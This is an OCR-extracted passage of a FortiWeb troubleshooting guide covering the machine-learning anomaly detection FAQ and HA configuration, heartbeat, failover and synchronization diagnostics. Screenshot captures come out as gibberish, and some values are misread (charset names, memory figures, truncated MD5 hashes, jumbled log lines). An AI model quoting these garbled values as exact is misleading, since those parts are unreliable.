GEO-IP on FortiWeb is updated twice a month. However, FortiGuard is updated in real time.

Machine Learning - Anomaly Detection

FAQ

« How to handle false positives for machine learning - Anomaly Detection? on page 127

« Which content-types are supported by ML? on page 127

« Which charset are supported by ML? on page 128

« What are the major specification & limitation of machine learning - Anomaly Detection on page 128
« How to find out the SVM threat model database version? on page 129
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Why is machine learning anomaly case-sensitive with URL and parameter name? Can we turn it off? on
page 129

After how many minutes or hours the “unconfirmed” parameter will be discarded by the garbage collector?
on page 129

Is there a way to check how many samples are discarded due to ‘sample-limit-by-ip’ in the machine
learning database? on page 130

Is Sample Collection mode Extended removed in the 6.4 version? | don’t see it in GUI or CLI configuration
on page 130

The 6.3 option “dynamically update when parameters change is enabled” is no longer available in 6.4/7.0.
Are there any mechanism changes? on page 130

How does noisy samples impact machine learning function, and how to alleviate the impact? on page 131

Machine learning trouble-shooting

FAQ

Machine learning oes not learn parameters successfully on page 131

Machine learning status does not change from Unconfirmed to Running stage on page 132
Machine learning does not block traffic on page 132

Machine learning upgrade&compatibility issues on page 132

How to handle false positives for machine learning - Anomaly Detection?

There are two svm-types: standard and extended. If standard is selected, the system automatically disables the

svm models which can easily trigger false positives. If extended is selected, the system enables all svym models.

So when you find unexpected false positives, please just leave svm-type as standard (By default).

Which content-types are supported by ML?

Support list:

multipart/related
application/soap+xml

text/xml, application/xml, application/vnd.syncml+xml, application/vnd.ms-sync.wbxml
multipart/form-data

text/html
application/x-www-form-urlencoded
text/plain

multipart/x-mixed-replace
application/rss+xml
application/xhtml+xml
application/json, text/json

Unsupported:

FortiWeb Trouble-shooting Guide
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« message/http

« application/rpc

« application/x-amf

« application/vnd.syncml+wbxml

Which charset are supported by ML?

FortiWeb machine learning supports most of the popular character sets. You can check with CLI as below:

FortiWeb # config waf machine-learning-policy
FortiWeb (machine-learni~g) # edit 1

FortiWeb (1) # config allow-domain-name
FortiWeb (allow-domain-n~m) # edit 1
(

FortiWeb (1) # set character-set
AUTO AUTO

BIGS BIGS

GB2312 GB2312

IS0-2022-JP

IS0-2022-JP-2

IS0-2022-KR

IS0-2022-JP
IS0-2022-JP
IS0-2022-KR

-2

Is0-8859-1 IS0-8859-1
Is0-8859-2 IS0-8859-2
IS0-8859-3 IS0-8859-3
IS0-8859-4 IS0-8859-4
IS0-8859-5 IS0-8859-5
ISO-8859-6 ISO-8859-6
IS0-8859-7 IS0O-8859-7
ISs0-8859-8 IS0O-8859-8
IS0-8859-9 IS0-8859-9
ISs0-8859-10 IS0-8859-10
IS0-8859-15 IS0-8859-15
Shift-JIS Shift-JIS
UTF-8 UTF-8

What are the major specification & limitation of machine learning - Anomaly
Detection

1. One server policy can only enable one machine learning policy;

2. One machine learning policy can create one or more domains; no matter how many machine learning policies
are enabled,;

3. One URL can learn maximum 128 parameters;
4. One domain can learn maximum 1000 parameters;
5. The maximum number of domains is listed as below.

These specs are the result of a comprehensive evaluation based on the memory of the platform. It cannot be
changed easily, otherwise there will be a risk of insufficient memory, thereby may affect other normal business
forwarding, and there is no workaround for now.
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Platform Domains in all ML policies
100D/100E 4
400C/400D/400E 6
600D/ 600E 16
1000D/1000E/3000D/3000DFsx/4000C 32
2000E/3000E/3010E/4000D 64
2000F/3000F 96
4000F 192
VM

memory<=4G 4
memory<=8G g8
memory<=16G 16
memory>=16G 32

How to find out the SVM threat model database version?
You can see the version in ‘diag sys update info’. SVM database is included in the general FortiWeb signature
database:

FWB-AWS-MO1 # diagnose system update info
FortiWeb signature

Version: 0.00296
Expiry Date: Fri Aug 19 2022
Last Update Date: Thu Aug 19 14:00:09

0.00271

Why is machine learning anomaly case-sensitive with URL and parameter name?
Can we turn it off?

Machine learning is case-sensitive with URL&parameter name, just because case-sensitive is by defaultin
Linux systems.

No option to turn it off at present.

After how many minutes or hours the “unconfirmed” parameter will be discarded
by the garbage collector?

A parameter is in unconfirmed status initially, and it will be set to be Confirmed if the parameter is contained in
the requests from a certain number of different source IPs within the given time. Otherwise, the parameter will
be discarded.

ip-expire-cnts defines "the number of different source IPs", while the ip-expire-intval defines the
given time period.
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The valid range for ip-expire-intval is 1-24 in hours, and the default value is 4. The valid range for ip-
expire-cntsis 1-5, and the default value is 3.

Is there a way to check how many samples are discarded due to ‘sample-limit-
by-ip’ in the machine learning database?

There is no way to check such statistics. Samples exceeding the threshold per 30 minutes will not be collected
any more.

This is different from the “Collected Sample” displayed in the Tree View tab. “Collected Samples” means the
“effective” samples. For example, when this number reaches 400, machine learning will start to build the initial
mode; when it reaches 1200 and find there are a few patterns generated (the model is considered to be stable),
machine learning switches to standard mode.

Is Sample Collection mode Extended removed in the 6.4 version? | don’t see it in
GUI or CLI configuration

Yes, options to configure sample-collecting-mode are removed from 6.4 GUI & CLI. You can think that the
process is similar while some of the modes’ implementation have been changed and simplified — machine
learning works in initial mode (like normal or fast mode as in 6.3) at first (when samples reaches the start-min-
count, default 400), and will switch to standard mode with more effective samples (when the number of samples
accumulates to switch-min-count, default 1200, and switch-percent is smaller than the value you set; please
refer to the CLI guide for detailed description).

The 6.3 option “dynamically update when parameters change is enabled” is no
longer available in 6.4/7.0. Are there any mechanism changes?

6.4/7.0 machine learning uses different mechanisms to detect changes. The new refreshing mechanism uses a
sliding window instead of boxplot to simplify ML.

Related CLI commands are as below; you can also check the detailed meaning in FortiWeb CLI Reference.
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sliding-win-time ~ After the standard model is built, FortiWeb keeps updating it accordingto 15 (minutes)
<sliding-win- the newest samples so that the model can be up to date even when your
time_int> domain changes, such as when new URLs are added and existing

parameters provide new functions.

sliding-win-time defines how frequently FortiWeb updates the

standard model.

The valid range is 15-1440 in minutes.
sub-window-size If there isn't any new pattern generalized during the s1iding-win-tims, 50
<sub-window- the system will not update the standard model until the number of samples
size_int> reaches the sub-window-siz=.

The sub-window-size can be setas 50 or 100.
sub-window- Every time the standard model is updated, FortiWeb counts it as one sub- 40
count <sub- window-count. If a certain times of sub-window-count have passed
window-count_  and there isn't any sample coming in for a pattern, FortiWWeb considers this
int> pattern outdated, and will discard it.

The sub-window-count can be set as 20, 40, or 80.

For example, assuming the sub-window-count is 20, then FortiWeb will

discard a pattern if there isn't any sample collected for it after the model
has been updated for 20 times consecutively.

How does noisy samples impact machine learning function, and how to alleviate
the impact?

If a string is learned during the collecting stage, it'll not be blocked in the running stage. That'’s the difference
when using “cmd” and “mode”.

Noisy samples can be detected during the sample collection period. Some samples can be treated as abnormal
samples and excluded from the samples used to build the anomaly detection model. However, if such samples
account for a large proportion, they’ll usually not be detected as noise.

Another possible way to alleviate this problem is to enable signature profiles. Once a request is blocked by
signature, it'll not be learned as a sample.

Below sections are troubleshooting methods for some typical issues.

Machine learning trouble-shooting

Machine learning oes not learn parameters successfully

You need to check both HTTP request and response from the following aspects:
1) If the domain has been learnt correctly;
2) The charset is correct (in the support list) in the HTTP response;

o Charsetis setin HTTP response header as “Content-Type:text/html; charset=xxx;”
« Charset can also be included in the HTTP response body as <META .... charset=xxx">

« The maximum bytes buffered for HTTP response body is 2048; charset cannot be learnt if it's out of this
range.

3) There is an acceptable Content-Type in the response;

Please refer to the FAQ section for the content-type supported by ML.
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Note: machine learning examines Content-Type in the response, not the request. If the body of a HTTP request
includes XML or JSON, but the Content-Type in the response is text/html, the parameter will NOT be
collected/learnt.

4) Only if the HTTP return code is 200, a parameter will be learnt.

Machine learning status does not change from Unconfirmed to Running stage

1. Check if the “Collected Samples” reaches 400 (the default start-min-count), which is the default number for an
initial model to be built up;

2. Check if new requests meet the requirements of ip-expire-intval (1-24 hours) and ip-expire-cnts
(source IPs).

You can set both value as 1 to make it easier for test.
3. Sending traffic from single source and multiple XFFs:

« Enable Inline Protection Profile and choose “Use X-Header to Identify Original Client's IP”.

« Need to use public IP addresses to test instead of private IPs.

« Sometimes you may use curl to verify the functionalities, however please note that the behavior of different
curl versions may vary. It's better to double check the traffic/request actually sent out with packet capture or
FortiWeb tlog.

E.g, with curl 7.68.0 on Ubuntu 20.0.4, the XFF IP 102.11.2.3 will be recognized as the “Original Source” in
tlog with the 1st curl command as below. But on Win10 with curl 7.78.0, just the 1st curl command cannot
be identified as the “Original Source”; the other 3 formatted commands will take effect and trigger the
machine learning process.

curl http://direct.ama0Ol.com/index.php?new para=123 -H 'X-Forwarded-
For:102.11.2.3"

curl http://direct.amall.com/index.php?new para=123 -H “X-Forwarded-
For:102.11.2.3" B

curl http://direct.ama0Ol.com/index.php?new para=123 -H X-Forwarded-For:102.11.2.3

curl http://direct.ama0Ol.com/index.php?new para=123 -H X-FORWARDED-FOR:102.11.2.3

Machine learning does not block traffic

1. In Machine learning > Anomaly Detection > Tree View, click Test Sample, then enter a parameter value
to verify whether it will be detected as an anomaly at the current strictness level.

Only if a parameter is recognized as an anomaly first by HMM model, it will be then sent to SVM model to
double check if it's a real attack.

2. Check if FortiWeb works in Active-Active-Standard or Active-Active-High-Volume mode, which are not
supported yeton 6.3 & 6.4.

This issue has been resolved on FortiWeb 7.0 and later releases.

Machine learning upgrade&compatibility issues

FortiWeb 6.4 uses MySQL while 6.3 uses Redis. So after upgrading from 6.3 to 6.4, old machine learning data
will be lost.

Upgrading from 6.3/6.4 to 7.0 is supported.
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HA issues

FAQ

What is the least configuration to set up HA? on page 133

What is the configuration prerequisite to successfully establish HA status on nodes? on page 133
Check if the heartbeat links are configured & connected properly: on page 134

Does heartbeat work in layer 2 or layer 3?7 on page 134

Will HA nodes use physical MAC address or virtual MAC address for communication? on page 134
How to manage HA nodes, especially the secondary nodes via SSH or GUI? on page 135

Does FortiWeb synchronize session information in HA mode? on page 135

HA trouble-shooting

FAQ

Common Troubleshooting Steps on page 136

Troubleshooting HA issues when FortiWeb nodes are deployed on Hypervisors - Extra configuration on
ESXi for HA deployment on page 137

HA Status issue 1 - All nodes are Primary on page 139
HA Status issue 2 - Unexpected switch over on page 140
Traffic drops down in HA environment on page 142

HA Synchronization issues on page 145

What is the least configuration to set up HA?

To set up FortiWeb HA, the below configuration are required at least:

ha mode
ha group-id
set hbdev <port_id>  #send heartbeat signals & synchronization data

set monitor <port_id>  #not must but recommended; support physical & aggregate ports only (not
support VLAN or 4-port switch)

set tunnel-local 10.0.0.1 #when network-type is udp-tunnel
set tunnel-peer 10.0.0.2 #when network-type is udp-tunnel

What is the configuration prerequisite to successfully establish HA status on nodes?

To establish normal HA status, 4S (4 Sames) are required:

FortiWeb Trouble-shooting Guide

Same Platform

Same Firmware Version
Same Group ID

Same Override option
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Check if the heartbeat links are configured & connected properly:

« Verify that heartbeat links are correctly configured and connected:

« Heartbeat interfaces should be dedicated ones, cannot be used as monitor interfaces or reserved
management interfaces at the same time

« Ports that currently have an IP address assigned for other purposes (that is, virtual servers or bridges)
CANNOT be re-used as a heartbeat link

« The heartbeat interface will be assigned with an IP address within169.254.0.0/16, so do not configure
other network interfaces (including VLANSs) with this subnet

« Connect one heartbeat port to the same port number on the other HA group members.

« FortiWeb supports up to 2 heartbeat interfaces, however please make sure that the primary and
secondary link is not crossed (that is, the primary heartbeat interface is not connected to the
secondary heartbeat interface on the other appliance).

« If a switch is used to connect the heartbeat interfaces, the heartbeat interfaces must be reachable by
Layer 2 multicast.

Does heartbeat work in layer 2 or layer 3?

Bases on different HA modes and platforms, heartbeat will work in layer 2 or layer 3

« Flat: by default, HA uses ether type 0x8890 to send layer 2 multicast heartbeat packets

« Udp-tunnel: one needs to specify the tunnel-local and tunnel-peer IP address and HA sends heartbeat
packets via UDP port 6055 between these two IPs.

Platform Hardware VMware KVM
HA mode Active-Passive Active-Passive Active-Passive
Active-Active-Standard Active-Active-Standard  Active-Active-Standard
Active-Active-High-Volume Active-Active-High- Active-Active-High-Volume
Volume
Network- Flat Flat Flat, UDP(AAH)
type
Platform AWS Azure OCI
HA mode Active-Passive Active-Passive Active-Passive
Active-Active-High-Volume Active-Active-High- Active-Active-High-Volume
Manager Volume
Manager
Network- UDP UDP UDP
type

Will HA nodes use physical MAC address or virtual MAC address for communication?

The situation is different on different HA modes:

« Active-Passive mode: IP addresses on all traffic ports and VIPs on the primary node will use a virtual mac
address formatted like “00:09:0F:A0:CC:02” to reply to a visit.

The secondary nodes will still use the real-mac until it switches to be the primary node.
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« Active-Active-Standard mode: the same as Active-Passive mode.

« Active-Active-High-Volume mode: IP addresses on the physical ports will still use the original mac address,
while VIPs will use virtual mac address.

This implementation leads to extra configuration on the hypervisors (ESXI, etc.) to allow communication for
such virtualized MAC addresses that do not actually exist on physical ports.

How to manage HA nodes, especially the secondary nodes via SSH or GUI?

If HA is deployed in active-passive or standard active-active modes, it's necessary to add a reserved
management interface (or interfaces) and HA static/policy route to manage HA nodes, especially the secondary

nodes.

FortiWeb Trouble-shooting Guide

« This option is not a MUST for HA setup but is necessary for active-passive and standard active-active

modes, because in these two modes, the IP address and other settings on all interfaces will be
synchronized to other HA members unless a port is set as “Reserved Management Interface”.

If the reserved network interfaces are not in the same subnet with the management computer, you need to
configure the next-hop gateways in HA Static Route or HA Policy route
CLI:

config system ha-mgmt-router-static

config system ha-mgmt-router-policy

GUL:

=73 Fortiweb-vM Fwg 51

& System > Basic HA Static Route HA Policy Route HA Health Check
Zalis * || 4 CreateNew | & Ecit Delete
Network >
# IP/Mask(IPv4/IPv6) Gateway(IPv4/1Pv6) Device
Firewall >
1 0.0.0.0/0 10.65.1.254 tl
Config b3 / por
High Availability &4

Topology

Does FortiWeb synchronize session information in HA mode?

Session synchronization can be enabled for session fail-over protection, but it's not supported by all HA modes.

« Session Pickup: Available only in Active-Active-Standard mode.

Session information will be synchronized from the primary node to other HA members, so if HA failover
takes place, the other node elected as the new primary will use the session information to resume
connections without interruption.

Note: Only sessions that have been established for longer than 30 seconds will be synchronized.
Layer 7 Persistence Synchronization: Available only in Active-Passive mode.
Actually this feature is not implemented by synchronizing sessions.

When this option is on, FortiWeb enforces session persistence between the primary and secondary
appliances at the application layer.
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HA trouble-shooting

Common Troubleshooting Steps

If a high availability (HA) cluster is not behaving as expected, use the following troubleshooting steps to help find
the source of the problem:

1. Ensure the physical connections are correct:

« Ensure that the physical interfaces that FortiVWeb monitors to check the status of appliances in the cluster
(Port Monitor in HA configuration) are in the same subnet.

« Ensure that the HA heartbeat link ports are connected through crossover cables. Although the feature
works if you use switches to make the connection, Fortinet recommends a direct connection.

2. Ensure the following HA configuration is correct:

« Ensure that the cluster members have the same Group ID value, and that no other HA cluster uses this
value.

« Specify different Device Priority values for each member of the cluster and select the Override option. This
configuration ensures that the higher priority appliance (the one with the lowest value) is maintained as the
primary as often as possible.

3. Use the following commands to collect status information and diagnose logs for further analysis:

e get system status / ha #HA status & basic running config view
e diagnose system ha #More detailed HA information
e execute ha dbver / md5sum / synchronize

e diagnose debug application hamain / hasync / hasync-base / hatalk

diagnose debug application Configures the debug logs for HA synchronization to display messages
hasync 7 about the automatic configuration synchronization process, commands that
failed, and the full configuration synchronization process.

Run on both members of the HA cluster to confirm configuration
synchronization and communication between the appliances.

The valid range of log level is 0—7, where 0 disables debug logs for the
module and 7 generates the most verbose logging.

Before you run this command, run the following commands to turn on

debug log output and enable timestamps:
diagnose debug enable
diagnose debug console timestamp enable

diagnose debug application Configures the debug logs for HA synchronization for L7 persistence.

hasync-base 7 L7 persistence is available only in Active-Passive mode.

diagnose debug application Configures the debug logs for HA heartbeat links to display messages

hatalk 7 about the heartbeat signal, HA failover, and the uptime of the members of
the HA cluster..

diagnose debug application Configures the debug logs to display the interaction messages between

hamain 7 hamain and hatalk (heatbeat), as well as other kernel or function modules

that need HA support
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diagnose debug application Configures the debug logs for HA health check messages.
hahlck 7 HA health check is available only in Standard Active-Active mode.

4. Collect HA related logs:

« System Eventlog: Log&Report > Log Access > Event

« /var/log/gui_upload/ha_event_log #Download from System > Maintenance > Backup & Restore > GUI
File Download/Upload (will be archived in the debug log in future builds)

Troubleshooting HA issues when FortiWeb nodes are deployed on Hypervisors -
Extra configuration on ESXi for HA deployment

In most cases, traffic ports except the heartbeat and reserved-mgmt ones on FortiWeb will use a virtual MAC
address, so in VM ESXi environment such as VMWare ESXi, if you want to visit the IP address or VIP, you'll
need to enable the promiscuous mode on the traffic port. Actually you need to enable all three options for ESXi >
Networking > Port-Groups > Edit settings > Security > Promiscuous mode, MAC address changes and Forged
transmits.

The specific configuration is based on different HA modes:

« Active-Passive mode: IP addresses on all traffic ports and VIPs on the primary node will use a virtual mac
address formatted like “00:09:0F:A0:CC:02” to reply to a visit, so promiscuous needs to be enabled on all
traffic ports.

The secondary nodes will still use the real-mac until it switches to be the primary node.
« Active-Active-Standard mode: the same as Active-Passive mode.

« Active-Active-High-Volume mode: IP addresses on the physical ports will still use the original mac address,
while VIPs will use virtual mac address, so if just the Interface IP is used as the Virtual Server in Server
Policy, promiscuous can be disabled; but if VIPs are created and bound to Server Policy, promiscuous
needs to be enabled on the traffic ports.

E.g. HA AS mode in ESXi platform:

+Cresteew] 4 ¢
Virtual IP
- Name Members 1Pv4 1Pv4 Access Status Link Status Type Ref.
DNS [ Physical €D
Packet Capture ] port1 10.65.151/24 HTTPS PING SSH SNMP HTTP FortiWeb Manager ring Down i Physica

Firewall > [-- port2 192.168.101.101/24 ]m—rps PING SSH SNMP HTTP FortiWeb Manager # Physical
Physical
# Physical
Physical
Physical
# Physical
# Physical
Physical
# Physical

i port3 192.168.102.101/24 HTTPS PING SSH SNMP HTTP FortiWeb Manager
B port4 00.00/0
# ports 000.0/0
B port6 000.0/0
i port7 0.0.0.0/0
® port8 0.0.0.0/0

port9 000.0/0

©O 0 00000000
© o000 o NRr NN

i port10 0.0.0.0/0

System ¥ S| 4 CreateNew | #

# Name 1Pv4 Address 1Pv6 Address Interface

1 VIP01 192.168.101.100/24 /0 port2
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vmware ESXi” 00t@1065131 v | Helpv | (CR
| “I% Navigator 1 | @ FwB_s1
v Host
g ®# Console 8 Monitor | W Shutdown i Suspend & Restart |  Edit | C Refresh | ¥ Actions cPU D
Manage
o FWB 51 N 371 MHz
[ =
O Guest 0S Other 2.6.x Linux (64-bit) MEMORY
+ &) Virtual Machines B 3’:;.:::?2?235 Sessx/esx\ 4.0 and later (VM version 7) 303 C8 =
~ (@ Ubuntu_66 Moy N romee 5
Monitor Memory 408 4.34GB
» @ Ubuntu_62 Host name FWB_51
» (f ZTNA_FGT_68
- @ FWB_52 ~ General Information ~ Hardware Configuration
Monitor ~ € Networking » @ cru 2VCPUs
Host name FWB_51 . \emory 4GB
Monitor 2
1P addresses 1 192 168101 101 » 2 Hard disk 1 3268
LEDU A 2.192.168.101.100 » M Network adapter 1 VM Network (Connected)
Stol
B storage m 3. 1680:20c 29ff fecd 192 » M Network adapter 2 ZT_101 (Connected) ]
+ @ Networking 4.150.15.15.15
- @ z1.101 5. 1e80:20c-29ffee9-fe0 » M Network adapter 3 2T_102 (Connected)
et 6. 1e80::20c:29ff fee:1o8 » M Network adapter 4 FWB_100 (Connected)
7.1065.1.51
@ vSwitcho » M Network adapter 5 FWB_100 (Connected)

More networks...

[£] Recent tasks

8. 1e80::20c:29ff fee:190
9. 1e80::4bd:9dff fe8f-854a
10. fe80::20c 29ff fee9:fea
1. 180::20c:29ff fee9:fd6
12.169.254.0.1

13. 1e80::240:14ff fe70:84d2
14. e80::20c 29ff fee9:fae
15. e80::20c:29fffee:fcc

» M Network adapter 6
» M Network adapter 7
» W Network adapter 8
» M Network adapter 9

» M Network adapter 10

o (8 \firion ned

FWB_100 (Connected)
FWB_100 (Connected)
FWB_100 (Connected)
FWB_100 (Connected)
FWB_100 (Connected)

4 man

By default, port2 (Network Adapter 2) only processes the original MAC address assigned by ESXi:

00:0c:29:€9:0f:9a:

5 Edit settings - FWB_51 (ESX/ESXi 4.x virtual machine)

» Wl \emory
» L Hard disk 1
+ & sCSl Controller 0

» MW Network Adapter 1

v Ml Network Adapter 2

Status

Adapter Type

MAC Address

» M Network Adapter 3

» M Network Adapter 4

MB
E
LS| Logic Parallel
WV Network
ZT_101

Connect at power on

VMXNET 3

Automatic ¥

ZT 102

FWB_100

4

4

Caonnect

Caonnect

Connect

l

Save H Cancel l

&

But as HA-AAHV mode is enabled, IPs including the VIP on port2 uses a virtual MAC: 00:09:0f:a0:cc:02.
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A, linkfai
linkfail
linkfail=
linkfai
linkfai
linkfail

, Linkfa
linkfai
Linkfai
linkfail=0

7 [Edit port group - 2T_101

Name

VLAN ID

Virtual switch

@ Accept O Reject O Inherit from vSwitch

@ Accept JO Reject O Inherit from

@ Accept |O Reject O Inherit from vSwitc

Click to expand

Click to expand

HA Status issue 1 - All nodes are Primary

Regarding HA status issues, a typical issue is that both HA nodes are in the primary role.
Follow these steps to troubleshoot:
1. Verify the “4 Sames” HA configuration prerequisite:

The same Platform, same Firmware Version, same Group ID and same Override option.
2. Verify that heartbeat interfaces are configured correctly and properly.

Please refer to above section HA Key Settings > Heartbeat part for more details.
4. Test the cables and/or switches in the heartbeat link to verify that the link is functional.
5. Verify that the ports on Monitor Interface are linked up.

6. If the heartbeat link passes through switches and/or routers, you may need to adjust the time required after a
reboot to assess network availability before electing the main appliance. To do this, use the command “set
boot-time <seconds_ int>".

7. Check if CPU usage of HA members are extremely high.

It's rare but if the CPU usage of a certain HA appliance is extremely high, the system may fail to send or receive
heartbeat packets, thus causing HA status abnormal too.
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8. For debugging logs, use commands “diagnose system ha status”and“diagnose debug

application hatalk 7”tocheckthe heartbeat communication between the primary and secondary
appliances.

The key point is to guarantee that HA member information for the peer node can be received and is correct.

E.g. the hbdev port10 gets disconnected, the peer HA member FVVM04TM21001050 leaves HA group.

FortiWeb # diagnose debug application hatalk 7

FortiWeb # diagnose debug enable

(2021-12-27 22:56:03 hb port.c:324) Enter Fun : init hb ports, port portl0, backup
(2021-12-27 22:56:03 hb port.c:305) HB sockfd for interface (portl0) = 9
(2021-12-27 22:56:03 hb.c:139) override old: 1 -> new: 1
(

2021-12-27 22:56:03 hb.c:150) MyHB: gid 11, dpri 5, group name Group AAS, sn
FVVM08TM21000613

(2021-12-27 22:56:03 hb timer.c:252) Member (FVVM04TM21001050) is too staleness, need
to clean it from the ha group ()

(2021-12-27 22:56:03 hb timer.c:266) Send ha member leave trap, sn:FVVM04TM21001050
(2021-12-27 22:56:03 hb msg.c:62) Send ha member change, rv 0

(2021-12-27 22:56:03 hb idx.c:160) Delete member id:FVVM04TM21001050

ha reader:325 nstd recv msg group:28

recv msg from ha, msg type:FREE sn:FVVM04TM21001050 id:0
nstd recv msg from ha, msg type:3

HA Status issue 2 - Unexpected switch over

When you found HA switchover happened but not sure about the reason, you can try to check the causes with
following steps:

1. Check the HA primary role election rule
The primary HA role is elected according to these rules:

« If Override is disabled:

Available ports number (Monitor) > Uptime > Priority > SN
« If Override is enabled:

Available ports number (Monitor) > Priority > Uptime > SN

Serial numbers are sorted by comparing each character from left to right, where 9 and z are the greatest values,
and result in highest placement in the sorted list. Since it's very rare that different nodes have the exact same
uptime, SN is rarely compared.

2. Check if HA heartbeat links are normal and heartbeat packets can be sent and received normally.

3. Check if CPU usage of HA members are abnormal.

If the CPU usage of a HA appliance fluctuates and sometimes reaches 100%, the system may fail to send or
receive heartbeat packets from time to time, thus causing HA status unstable.

In above cases, sometimes HA heartbeat packets may lose. One can try to increase the failure detection
threshold if a failure is detected when none has actually occurred. For example, during peak traffic times, if the

main appliance is very busy, it might not respond to heartbeat packets in time, and the standby appliance may
assume that the main appliance has failed.

FortiWeb # sho full sys ha
config system ha
set hb-interval 10 #heartbeat interval, range 1-20 (100ms)
set hb-lost-threshold 3 #heartbeat threshold for failed, range 1-60
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4. Check HA event logs to find the timeline and causes for HA failover:

Sometimes you may be not sure about the events and causes but just observed an unexpected HA failover,
then you can check the HA failover events in these ways/logs.

« Check the Event logs, which include the reasons for HA status changes and can be filtered with “Action:
HA-Switch” or other options as below:
Log & Report > Log Access > Event > Action: HA-Switch, HA-Synchronize, HA-member-left, HA-
member-join, HA-monitor-port.

E.g. Below logs show different HA switch events caused by priority changes, monitor ports status changes
and uptime comparison.

@ Dashboard
+ Network

#
£ System

N& Security Fabric

B Policy
= Server Objects

>

>

>

>

& User >
>

>

¢ Application Delivery >
>

[ O S

& Web Protection

© | | [ Action: HASwitch OR NOT [© AddFilter

Date/Time
2021/12/25 20:38:01
2021/12/2520:37:46
2021/12/2316:49:40
2021/12/23 16:46:30
2021/12/2316:23:24

2021/12/2315:27:29

Level

User Inte...
daemon
daemon
daemon
daemon
daemon

daemon

Action

HA-Switch
HA-Switch
HA-Switch
HA-Switch
HA-Switch

HA-Switch

Message
HA switch from primary to secondary, the effective factor of the election is Priority .
HA switch from secondary to primary, the effective factor of the election is Monitor .
HA switch from primary to secondary, the effective factor of the election is Priority .
HA switch from secondary to primary, the effective factor of the election is Monitor
HA switch from primary to secondary, the effective factor of the election is Priority .

HA switch from master to slave, the effective factor of the election is Age.

« Check more detailed HA file logs via diagnose command “diagnose system ha file-log show” or download
the ha_event_log via /var/log/gui_upload/:

E.g. Check HA switch events and causes:

FortiWeb # diagnose

2021-12-25 20:37:
2021-12-25 20:37:
2021-12-25 20:37:

SECONDARY -> new role PRIMARY role changed:

system ha file-log show |

grep switch

45 dbg-hamain ha mode.c:62 Recv ha switch
45 dbg-hatalk hb msg.c:40 Send ha switch, rv 0O
46 dbg-hamain ha mode.c:303 In ha mode process, old role

1 switch reason: 1

2021-12-25 20:37:46 dbg-hamain ha mode.c:315 switch SECONDARY -> PRIMARY

2021-12-25 20:37:46 dbg-hamain ha mode.c:325 HA switch from secondary to primary,
the effective factor of the election is Monitor .2021-12-25 20:37:46 dbg-
hamain ha mode.c:101 Send ha mode swith trap, reason:Monitor

00 dbg-hamain ha mode.c:62 Recv ha switch

00 dbg-hatalk hb msg.c:40 Send ha switch, rv 0

01 dbg-hamain ha mode.c:303 In ha mode process, old role PRIMARY

1 switch reason: 2

01 dbg-hamain ha mode.c:342 switch PRIMARY -> SECONDARY

01 dbg-hamain ha mode.c:351 HA switch from primary to secondary,

the effective factor of the election is Priority .2021-12-25 20:38:01 dbg-

hamain ha mode.c:224 HA device into Secondary mode

2021-12-25 20:38:
2021-12-25 20:38:
2021-12-25 20:38:

-> new role
2021-12-25 20:38:
2021-12-25 20:38:
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Back up Web Protection Profile related

Last Modify Time Size
Sat Dec 25 21:45:17 2021 495MB

Sat Dec 25 21:45:11 2021 17489K8

Sat Dec 25 21:45:11 2021 172.97K8

Sat Dec 25 21:45:112021 181.75KB

Sat Dec 25 21:45:112021 157.79KB

@ Dashboard > || Backup &Restore | FTPBackup  Local Backup &R
& Network > | system Configuration (Last Backup: Mon Dec 6 19:17:022021)
I £ System v
I e —_ Restore
Config >
High Availability > Back up entire configuration JENRV-Jel]
Admin 5 || IncludeMachine Learning Data (B
Maintenance | Eneryption i
Backup & Restore
Firmware
System Time
Debug GUIFile Download/Upload
& Security Fabric >
& User , || Clearal
& Policy > Partition
¥ Server Objects > -
debug_disk.txt
+¢ Application Delivery >
N debug_out_d_cond_cpu.sh.txt
‘Web Protection >
R debug_out_d_procsh.txt
ecurity >
o Bot Mitigat | debug out d memshxt
ot Mitigation
= API Protection N debug_out_d_net.sh.txt
U Dos Protection > | ha.event.log

B IP Protection 5 | pertdata
2 Tracking > | perfdataold

= Machine Learning > | diog_logd

FortiWeb backend Shell:

~# tail -100 /var/log/gui upload/ha event log | grep switch
2021-12-25 20:37:45 dbg-hamain ha mode.c:62 Recv ha switch
2021-12-25 20:37:45 dbg-hatalk hb msg.c:40 Send ha switch,
2021-12-25 20:37:46 dbg-hamain ha mode.c:303 In ha mode process,
SECONDARY -> new role PRIMARY role changed:

Sat Dec 25 20:38:02 2021 9.69MB
Sat Dec 25 06:25:212021 9.61MB
Sat Dec 25 04:10:20 2021 9.60MB
Thu Dec 23 16:50:02 2021 0008

Delete

®

e R0 e e

Compress

>

T T W

1 switch reason:

Download

te

L N S S O

e

e

old role

2021-12-25 20:37:46 dbg-hamain ha mode.c:315 switch SECONDARY -> PRIMARY
2021-12-25 20:37:46 dbg-hamain ha mode.c:325 HA switch from secondary to primary,

the effective factor of the election is Monitor
hamain ha mode.c:101 Send ha mode swith trap,
2021-12-25 20:38:00 dbg-hamain ha mode.c:62 Recv ha switch
2021-12-25 20:38:00 dbg-hatalk hb msg.c:40 Send ha switch,
2021-12-25 20:38:01 dbg-hamain ha mode.c:303 In ha mode process,
role changed: 1 switch reason:

-> new role SECONDARY

.2021-12-25 20:37:46 dbg-
reason:Monitor

old role PRIMARY

2021-12-25 20:38:01 dbg-hamain ha mode.c:342 switch PRIMARY -> SECONDARY
2021-12-25 20:38:01 dbg-hamain ha mode.c:351 HA switch from primary to secondary,
.2021-12-25 20:38:01 dbg-
hamain ha mode.c:224 HA device into Secondary mode

the effective factor of the election is Priority

Traffic drops down in HA environment

Follow below steps to troubleshoot if the application traffic drops down after in HA environment or HA failover

takes place:

1. Verify that HA status on both/all members are correct after failover:

« Verify there is only one primary role

« Verify that all HA members have the correct and stable new status
Referring to the above troubleshooting steps in "Unexpected switch over".

2. Verify that the configuration has been synchronized completely

« Verify that the md>5 for SYS & CLI on the primary & secondary nodes via “execute ha md5sum” or
“diagnose sys ha confd_status” on the primary node to see if the configuration are identical

FortiWeb # execute ha md5sum

FVVM04TM21001050<Primary>
SYS: DO75A17ADDD37242326
CLI: 2D1DE97COC1F1968FB4

FVVM08TM21000613<Secondary>
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SYS: DO75A17ADDD372423263F4B31ACBSCTF
CLI: 2D1DE97COC1F1968FB4BFCES30E52A1B

« Verify that the Sync status on GUI top menu is “In Sync” (after 6.4 builds)
3. Verify that the requests are received by the new primary (former secondary) appliance:

« Verify that monitor ports on the former primary and the new primary appliance are configured and
connected symmetrically

« Verify that the route entries on upstream routers are configured correctly so that VIPs on FortiWeb are
reachable for the clients initiating the request

